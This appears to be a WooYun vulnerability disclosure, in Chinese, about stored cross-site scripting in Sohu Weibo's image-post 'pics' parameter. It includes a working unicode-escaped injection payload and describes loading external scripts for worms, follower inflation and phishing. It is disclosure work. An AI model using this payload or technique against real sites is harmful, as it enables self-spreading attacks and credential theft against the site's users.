WooYun.org

漏洞原因：post数据中的pics没有过滤 \
漏洞影响：随便插啥代码都行，可以大范围蠕虫、刷粉丝、钓鱼等
1 位置在搜狐微博发图片的那个pics参数中。
下面是一条普通的带图微博的post数据

msg	分享图片
pics	[{"url":"http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg","extraData":{"smallest":{"w":90, "h":120, "size":5010},"small":{"w":160, "h":213, "size":11146},"middle":{"w":312, "h":416, "size":24486},"big":{"w":312, "h":416, "size":24486}}}]

可以看到其中的pics是以json的形式发送的。
2 于是这里果断去测试了一下 \ ,因为在js中可以用 \+ASCII码 的形式表示任意字符的，果然没有过滤。
然后就顺手在url参数的jpg后面加了 "onload="alert(1) 的js编码（我就这么叫吧）形式，post数据就变成了下面的代码

msg	分享图片
pics [{"url":"http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029","extraData":{"smallest":{"w":90, "h":120, "size":5010},"small":{"w":160, "h":213, "size":11146},"middle":{"w":312, "h":416, "size":24486},"big":{"w":312, "h":416, "size":24486}}}]

ps：这里可以利用gainover的工具进行js编码转换 http://app.baidu.com/app/enter?appid=280383
发现成功插入了代码，弹出了1
图1

3 接着又分别测测试了插入<img>、<iframe>、<script>等标签对，表示都毫无任何压力的成功插入了。（有没有成功插入可以通过谷歌浏览器F12用颜色区分，或者复制到外部txt中查看）
图2 3 4
插<img>

插<iframe>

插<script>

4 如上，可以调用任意外部js文件，由于post数据中没有key、token等东西，所以蠕虫表示毫无压力。
具体蠕虫和刷粉丝的利用可以查看 @imlonghao 的这个帖子 WooYun: 搜狐微博某处存储型小松鼠+顺便提一提相关接口未加上TOKEN
5 cookie就算了，能盗取到，不过搜狐微博是http-only的，盗取到了也么啥用，也登不上（不过可以通过伪造钓鱼页面 骗取账号和密码）。还不如搞蠕虫，刷粉丝实在。
6 最后，也不奢求能有礼物，只求把rank给够。不要直接啥都不回复甩个 5rank 给我，因为这个的确危害影响蛮大的！~